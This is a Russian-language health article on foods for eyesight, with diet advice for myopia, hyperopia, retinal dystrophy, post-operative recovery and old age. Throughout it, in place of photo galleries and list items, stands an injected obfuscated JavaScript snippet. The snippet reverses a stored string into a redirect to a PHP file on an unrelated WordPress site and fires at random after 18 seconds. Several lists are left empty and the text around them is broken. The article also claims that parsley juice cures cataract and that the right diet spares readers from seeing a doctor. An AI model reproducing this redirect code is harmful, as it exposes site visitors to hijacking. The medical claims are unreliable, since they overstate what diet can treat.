Помощь для глаз: полезные продукты и нюансы питания

Работоспособность организма, в том числе и органов зрения, зависит от множества факторов. В XXI веке нагрузка на наши глаза возросла, что в совокупности с некачественным питанием приводит к снижению остроты зрения и формированию патологий. Какие продукты препятствуют этому и предотвращают развитие заболеваний?

Как улучшить зрение: полезные витамины и вещества

Для восстановления зрения необходимы продукты, обогащённые микроэлементами, витаминами и антиоксидантами. Подобные вещества оказывают положительное влияние на глаза, помогая бороться со свободными радикалами — элементами, которые при увеличении их количества могут нанести организму много вреда.

Это интересно! Свободные радикалы могут присутствовать в организме человека, что будет считаться нормой. При увеличении их числа изменяется способ кодирования генетической информации и структура белков, в результате чего иммунитет принимает эти клетки за чужеродные частицы, поэтому стремится их ликвидировать.

Наибольшей пользой для органов зрения обладают фрукты и овощи, имеющие тёмно-зелёный или оранжевый цвет. Дело в том, что в таких продуктах присутствует много каротина, способного уменьшать количество свободных радикалов. К ним относятся:

    морковь — источник витамина A и антиоксидантов, положительно влияющих на остроту зрения. Кроме того, в моркови присутствуют другие полезные для глаз вещества: натрий, железо, цинк, фосфор, поэтому названный овощ полезен для предотвращения развития дегенеративных процессов;
  • кисломолочные и молочные продукты — богаты витаминами B2 и D, а также содержат кальций. Перечисленные вещества защищают сетчатку глаз от пагубного воздействия ультрафиолетового излучения, повышают восприятие цветов и предотвращают помутнение хрусталика;
  • тыква — богата каротином, полезна для людей с ослабленным зрением;
  • шпинат — содержит цинк, медь, калий, фосфор и другие необходимые для глаз элементы. Особенно полезен лютеин, который защищает от развития патологий, например, катаракты — помутнения хрусталика, приводящего к частичной или полной утрате зрительной функции;
  • морская рыба (треска, тунец, сельдь, лосось, сардина, скумбрия) – жирные кислоты, входящие в их состав, поддерживают клеточные мембраны, а присутствующий белок укрепляет мышцы глаз;
  • петрушка — её сок помогает устранять конъюнктивит, катаракту и патологии зрительного нерва. В сочетании с соком моркови способствует восстановлению глаз после длительной нагрузки;
  • брокколи — содержит лютеин и зеаксантин, предотвращающие проблемы с органами зрения.
Обратите внимание! Для лучшего усвоения бета-каротина и витамина A рекомендуется употреблять продукты, содержащие перечисленные вещества, вместе с жирами. Например, салат из моркови целесообразно заправлять сметаной, а в морковный сок добавлять сливки.

Фотогалерея полезных для глаз продуктов

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29189,29188,29187,29186″]

Полезное питание для взрослых

Чем старше человек, тем чаще ему приходится сталкиваться с различными расстройствами. Органы зрения не исключение, ведь нагрузка возрастает, а организм не молодеет, поэтому правильное питание имеет большое значение для нормальной работы глаз.

Помимо названных ранее продуктов, полезными для взрослого человека являются:

    лук и чеснок — содержат большое количество серы, которая помогает сохранять чёткость зрения;
  • черника — устраняет усталость, положительное влияет на сосуды, нормализует внутриглазное давление и улучшает остроту зрения благодаря витаминам C и B1;
  • рыбий жир — полезные вещества, входящие в его состав, помогают предотвратить дегенерацию жёлтого пятна;
  • творог — витамин B12, содержащийся в продукте, улучшает циркуляцию крови, обеспечивая нормальный приток, а B2 стимулирует обменные процессы в роговице и хрусталиках;
  • чёрный шоколад — содержит флавоноиды, укрепляющие сосуды глаз и роговую оболочку.

Фотогалерея полезных продуктов для взрослых

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29185,29184,29183,29182″]

Питание для детей и подростков

Нагрузка в школе, частое пребывание за компьютером и гаджетами — далеко не полный перечень факторов, оказывающих негативное воздействие на глаза ребёнка. В результате органы зрения устают, а игнорирование проблемы способно привести к снижению их работоспособности. Как помочь ребёнку в этой ситуации?

Для улучшения работы глаз и уменьшения утомляемости следует добавить в рацион следующие продукты:

    Полезные продукты для глаз — видео

    Особенности питания при плохом зрении

    Правильное питание помогает не только избавиться от усталости, но и побороть некоторые заболевания. Дело в том, что при развитии патологий глаз организм нуждается в усиленной подпитке полезными веществами, поэтому устранение дефицита витаминов и элементов поможет в некоторых случаях избавиться от проблемы.

    Тем не менее к выбору продуктов для рациона нужно подходить грамотно, обязательно учитывая тяжесть симптомов, степень развития болезни и имеющиеся проблемы со здоровьем. Рекомендуется посетить врача, который обязательно учтёт названные ранее нюансы и поможет сформировать правильное меню.

    При близорукости

    Во время близорукости рацион должен быть легкоусвояемым и умеренным, чтобы не нагружать организм. Врачи советуют исключить жирные и солёные блюда, а также продукты, характеризующиеся повышенной кислотностью, например, маринады.

    В меню человека, страдающего от близорукости, рекомендуется включить:

      напитки:
      • овощные (микс из соков петрушки, свёклы и моркови);
      • черничный морс;
      • некрепкий зелёный чай;
      • отвар из шиповника или боярышника;
    • масла (в качестве заправки для салатов):
      • оливковое;
      • льняное;
    • зелень:
      • шпинат;
      • зелёный лук;
      • укроп;
      • листья салата;
    • салаты со следующими овощами:
      • морковью;
      • молодым зелёным горошком;
      • помидорами;
      • жёлтым и красным перцем;
      • брокколи;
      • капустой (цветной или морской);
    • фрукты и ягоды:
      • клюкву;
      • инжир;
      • персики;
      • цитрусы;
      • чёрную или красную смородину;
      • изюм;
      • бруснику;
    • нежирные сорта мяса:
      • баранину;
      • кролика;
      • курицу;
      • говядину;
    • лёгкие блюда:
      • молочный суп;
      • бульоны на нежирных сортах мяса;
      • овощные супы;
    • хлеб:
      • зерновой;
      • с отрубями или из муки грубого помола;
    • бобовые (в ограниченном количестве):
      • фасоль;
      • чечевицу;
    • крупы:
      • гречневую;
      • овсяную;
    • макаронные изделия — только из тёмных сортов муки.
    Возьмите на заметку! Полезна при близорукости смесь из грецких орехов и свежих абрикосов. Для приготовления потребуется взять названные компоненты в равных пропорциях, смешать их, приправив 2 ч. л. мёда на стакан средства. Смесь из орехов и абрикосов употребляют 2 раза в сутки по 2 ст. л.

    Фотогалерея продуктов полезных при близорукости

    ) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29181,29180,29179,29178″]

    Питание при дальнозоркости

    При развитии дальнозоркости рацион должен содержать пищу, богатую следующими витаминами и полезными веществами:

      $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tor»>

      Возьмите на заметку! При дальнозоркости полезно средство из 1 кг плодов шиповника, обязательно свежих. Их заливают 3 л воды и варят на медленном огне. После размягчения плодов следует измельчить шиповник и добавить 2 стакана мёда. Полученную смесь заливают 2 л кипятка и варят на слабом огне в течение 5 минут, затем средство разливают по ёмкостям и тщательно закупоривают. Подобный отвар принимают перед едой 4 раза в день по 100 мл.

      Во время развития дальнозоркости необходимо воздержаться от приёма следующих продуктов:

        Продукты при дальнозоркости — фотогалерея

        ) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29177,29176,29175,29174″]

        Помощь глазам при заболеваниях

        Казалось бы, что связь между питанием и развитием патологий глаз слаба или отсутствует полностью. Однако всегда нужно помнить, что в нашем организме все взаимосвязано, поэтому проблемы с одним органом могут указывать на наличие сбоя в другом.

        Не исключение и глаза, которые могут страдать из-за нехватки витаминов и полезных веществ, в результате чего повышается вероятность формирования следующих патологий и расстройств:

          Названные патологии чаще всего возникают при дефиците входящего в состав сетчатки витамина A. Однако он не является единственным элементом, недостаток которого может привести к развитию воспалительного процесса. На формирование патологий глаз оказывает влияние дефицит следующих витаминов:
            B1 — обеспечивает снабжение глазного яблока нервами, недостаток элемента становится причиной появления головных болей, раздражительности, уменьшения работоспособности;
          • B2 — снабжает глазные мышцы энергией, участвует в обмене веществ хрусталика и роговицы. При дефиците витамина повышается вероятность разрыва мелких сосудов, и развивается гемералопия;
          • B6 — принимает участие в белковом обмене, при недостаточном количестве витамина глаза быстро устают;
          • B12 — способствует созданию клеточно-нервной системы, но при недостаточном количестве ухудшается кровоснабжение глаз;
          • C — активно участвует в углеводном обмене и окислительных процессах, при нехватке элемента сосуды становятся хрупкими, что приводит к кровоизлияниям в глаза и разрушению тканей.

          Питание при дистрофии сетчатки глаза

          Сетчатка является важной частью глаз, обеспечивающей восприятие световых импульсов. Выход её из строя приводит к ухудшению или потере зрительной функции, поэтому предупреждение дистрофии является обязательным условием сохранения здоровья органов зрения.

          Как и в ранее описанных случаях, для сетчатки полезны витамины A, B и C, однако возрастает значение новых элементов. Это касается следующих компонентов:

            P — уменьшает проницаемость стенок капилляров и укрепляет их. Витамин входит в состав таких продуктов, как апельсины, плоды шиповника, листья чая и плоды черноплодной рябины;
          • E — предотвращает дистрофию и отслоение сетчатки, а содержится элемент в орехах, авокадо и злаковых культурах;
          • омега-3 — жирные кислоты, которые присутствуют в грецких орехах, сельди, скумбрии, растительных маслах и цельнозерновых продуктах.
          Обратите внимание! Не забывайте о пище, богатой лютеином. Его можно найти не только в петрушке и шпинате, но и в фисташках и яичном желтке.

          Дистрофия сетчатки и полезные продукты — фотогалерея

          ) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29173,29172,29171,29170″]

          Отёки под глазами: как с ними справиться

          Для устранения отёков под глазами не обойтись без следующих продуктов:

            Примерное меню на 1 день будет выглядеть следующим образом:
              $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/09/ovsyanka-s-fruktami-728×507.jpg» alt=»Овсянка с фруктами» width=»728″ height=»507″ /> Овсянка поможет справиться с отёками под глазами

            Правила питания после операции

            Задача больного, перенёсшего операцию на глазах, связана с обеспечением лёгкого и быстрого процесса выздоровления. По этой причине из рациона в обязательном порядке исключают:

              $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tor»>

              Обратите внимание! После операции рекомендуется вместе с врачом подобрать не только рацион, но и питьевой режим, иначе излишнее употребление жидкости приведёт к отёкам и послеоперационным осложнениям.

              В меню пациента можно включить продукты, которые положительно влияют на сетчатку глаз:

                Диета для улучшения зрения в преклонном возрасте

                В пожилом возрасте потребность в полезных веществах заметно возрастает, так как организм не может легко и быстро справляться с возложенными на него обязанностями. В результате ухудшается работа многих органов и систем, в том числе и зрения.

                Чтобы избежать подобного развития событий, в рацион включают пищу с селеном, цинком, витаминами C и E. Такое сочетание полезных веществ позволяет обеспечить защиту глаз от негативного воздействия солнечного света, а также восстановить ткани. В меню необходимо включить:

                  Продукты для зрения в пожилом возрасте — галерея

                  ) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29169,29168,29167,29166″]

                  Вредные продукты для глаз

                  Помимо полезной пищи, богатой витаминами, имеется категория продуктов, употребление которых сказывается отрицательно на состоянии и работоспособности органов зрения. Кроме упомянутых ранее соли, кофе и алкоголя, к ним также относятся:

                    белый хлеб — приводит к усиленной выработке инсулина, в результате чего снижается количество связующего белка, участвующего в поддержании здорового состояния глаз;
                  • мучные изделия — углеводы негативно влияют на макулу;
                  • копчёные и колбасные изделия — из-за холестерина негативно влияют на сосуды глаз, повышая внутриглазное давление;
                  • сладкие газированные напитки — большое количество сахара отрицательно сказывается на поступлении в глаза питательных веществ;
                  • пищевые добавки — содержатся в чипсах, жевательных конфетах и других изделиях. В результате их употребления увеличивается внутриглазное давление. Кроме того, добавки являются мощными аллергенами.

                  Фотогалерея вредных для зрения продуктов

                  ) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29165,29164,29163,29162″]

                  Здоровые глаза и хорошее зрение — достижение, ради которого стоит идти на жертвы — отказаться от вредной пищи, пусть и вкусной, но отрицательно воздействующей на зрительную функцию и снижающей её эффективность. Правильно подобранный рацион, содержащий в себе полезные вещества и витамины, избавит от проблем с глазами и необходимости обращаться к врачу.

Adblock
detector